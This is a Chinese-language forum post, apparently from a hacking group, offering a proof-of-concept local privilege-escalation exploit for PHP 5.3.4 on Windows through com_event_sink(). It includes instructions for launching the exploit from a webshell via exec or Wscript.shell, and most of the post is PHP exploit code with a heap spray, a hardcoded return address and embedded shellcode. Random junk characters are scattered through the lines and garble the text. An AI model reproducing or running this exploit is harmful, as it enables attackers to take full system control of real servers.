|
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
! ~3 y) M2 H1 o/ `& y
* _7 X, {! m o6 _0 o. J5 M测试方法如下:cmd /c x:\php\php.exe x:\test.php
6 ^) T' |( l# V# e
, }) S+ h; E" e5 ^# v下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
1 s. Q6 y* b* T) e, b这里是两个测试的截图:
! E8 |" {: b2 x l M% M- b! o. r1 a$ l* Z
6 G0 M- z1 {' C& ~; }( _! ~) o0 G
9 m8 X9 |! q( d9 B# o) N5 I; {$ l! B0 C! Z2 a
成功利用此漏洞的攻击者将获得系统的最高权限
5 {) C: R$ \& Q1 t$ O
% @0 R* |3 K8 w6 _( n. W$ O4 W1 t* F& V$ p; l! }
+ T; f% s3 l$ h8 N( N/ H
: H x, |+ u6 C% ]+ ~* |
" h0 h! o+ f. {3 }& v) Z" t关于漏洞分析稍后附上。一下是PoC代码:8 r/ P" R& c; X$ H L
- y2 J8 c% M2 F! b, t8 l
<?php
6 f6 n( f L9 X# B3 C5 ]6 j//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
" B4 }* Y7 t2 i I" Q' S//$eip ="\x44\x43\x42\x41";
9 T# o0 s" j% M: g3 M$eip= "\x4b\xe8\x57\x78";
, _) X: Q2 {" ^$eax ="\x80\x01\x8d\x04";! Q& D; k( e: N% n& |
$deodrant="";
! M) \$ D1 Y8 t- r2 l0 b2 O$axespray = str_repeat($eip.$eax,0x80);, |0 s! f( H2 |8 Q
//048d0190
# Y$ _# q+ e; I9 R4 Iecho strlen($axespray);
( j" S8 w9 ]+ E" Z" J! s/ z; C2 [3 Wecho "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
, ?6 C6 q0 L' g0 Yecho "Silic Group Hacker Army - BlackBap.Org";
4 q0 V/ U- d3 R//19200 ==4B32 4b00( L1 x e I H) p
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}4 F C4 C" J z2 @$ K+ D5 c" {
$terminate = "T";/ l8 B. f0 j- F9 j* E
$u[] =$deodrant;7 J9 @% y$ d \# b. r1 H1 U6 y( R$ X
$r[] =$deodrant.$terminate;
/ Y2 H( F7 f. S% [- J$a[] =$deodrant.$terminate;
F6 m- R! ?3 e# P+ {; @: r7 o( _$s[] =$deodrant.$terminate;% T, Q# M& c# M% c7 I
//$vVar = new VARIANT(0x048d0038+$offset); 这里是可控可改的2 v1 s# S2 J! R* ^: R3 t4 v
$vVar = new VARIANT(0x048d0000+180);
7 b9 a) Q- T& S6 B/ C) \; i% w9 t//弹窗代码(Shellcode)# ~6 q/ Y' V. ]3 Z. X' }; e1 U
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
+ m; u `3 j) ]6 {( l9 R$var2 = new VARIANT(0x41414242);7 Y" _& \% m9 }2 w+ ^ H$ t: |1 v3 [
com_event_sink($vVar,$var2,$buffer);
! O4 C7 W# ] ~; m& @+ z?>
- i3 z3 ?3 p+ B1 v# ]2 J |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|